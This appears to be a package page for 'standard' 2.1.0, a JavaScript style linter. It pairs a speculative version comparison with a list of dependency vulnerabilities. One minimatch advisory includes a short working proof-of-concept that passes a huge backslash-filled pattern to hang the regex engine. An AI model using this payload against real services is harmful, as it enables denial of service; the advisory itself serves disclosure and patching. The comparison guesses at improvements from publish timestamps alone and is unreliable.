Standard version 2.1.0 introduces a minor update to JavaScript Standard Style, building upon the foundations laid by version 2.0.0. Both versions share the same core dependencies, including tools like glob for file matching, jscs and eslint for code style checking and linting, split for stream processing, jshint for JavaScript validation, find-root for locating project roots, and minimatch for flexible file pattern matching. Developers will find the familiar consistency in these core tools invaluable for maintaining a consistent coding style across projects. The included developer dependencies, such as mkdirp, rimraf, and run-series, remain unchanged, indicating a focus on internal build and testing processes rather than significant feature additions.
The primary difference lies in the timing of the release, with version 2.1.0 being published slightly later on January 29, 2015, at 07:32:42.041Z, compared to version 2.0.0 at 02:55:14.747Z. This suggests a potential bug fix, dependency update, or minor refinement was implemented. While the package's functionality appears consistent, the newer release likely incorporates improvements addressing issues identified in the earlier version. For developers choosing between versions, opting for 2.1.0 is advisable; even small change can represent improvement by addressing corner cases and ensuring greater stability for JavaScript Standard Style. Both versions rely on the same MIT license, repository, and author information, ensuring a consistent development experience and promoting contributions. Keep your Standard updated.
All the vulnerabilities related to the version 2.1.0 of the package
Prototype pollution in pathval
A prototype pollution vulnerability affects all versions of package pathval under 1.1.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.